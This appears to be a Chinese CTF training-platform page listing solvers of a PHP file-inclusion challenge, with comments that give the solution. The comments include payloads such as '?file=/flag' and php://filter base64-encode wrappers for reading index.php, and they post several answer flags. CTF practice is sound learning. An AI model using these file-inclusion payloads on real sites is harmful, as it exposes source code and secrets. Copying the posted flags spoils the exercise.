评分(11)
解题动态
18171382569 攻破了该题 15小时前
krnxy777 攻破了该题 2天前
Wu. 攻破了该题 3天前
qq1002517 攻破了该题 4天前
麻辣鸽子头 攻破了该题 4天前
Arno_Zoffy 攻破了该题 5天前
Jasmine_Iris 攻破了该题 5天前
AioKT 攻破了该题 5天前
潭影空人心 攻破了该题 6天前
hdcc1 攻破了该题 7天前
linxingjun 攻破了该题 10天前
jaysongong 攻破了该题 10天前
violet1 攻破了该题 11天前
potato66 攻破了该题 11天前
一只小白鲸 攻破了该题 12天前
xiaoxuexue 攻破了该题 13天前
bak3l1 攻破了该题 13天前
妙龄 攻破了该题 13天前
19113115774 攻破了该题 13天前
评论
shingu 10月前
举报
这题过于简单了。?file=/flag。
HK1ng 1年前
举报
使用伪协议来解题,启动靶机发现有超链接,点击后发现有file变量,然后页面有index.php,于是猜想是不是传一个index.php,果然不是。然后就给出这个提示,想办法去读一下这个,然后这里就是用了php://filter/read=convert.base64encode/resource=filepath,表示以base64编码的方式进行读取指定路径的文件。然后解码就可以看到。
000ooo 1年前
举报
/index.php?file=/flag
哈哈哈嘿嘿嘿 11月前
举报
为什么
Zhumeng 1年前
举报
php伪协议读取index.php
Jiafeng 1年前
举报
我在你的评论下面补充全吧:php://filter/convert.base64-encode/resource=index.php
Wang_Micro 1年前
举报
flag{642c1d8cf84d01e3a2df403e83d3e43b}
33555 1年前
举报
/index.php?file=///flag
Pearpeach1 1年前
举报
?file=php://filter/read=convert.base64-encode/resource=index.php
hao7 1年前
举报
flag{dff1aea3fcdd906ce70c1998addf1ccc}
17795946336 1年前
举报
flag{159cf1e0d16cf846e61ae8a3ba27e912}
Z20g00d 1年前
举报
flag{38cc5dc6199822623663592b58cec109}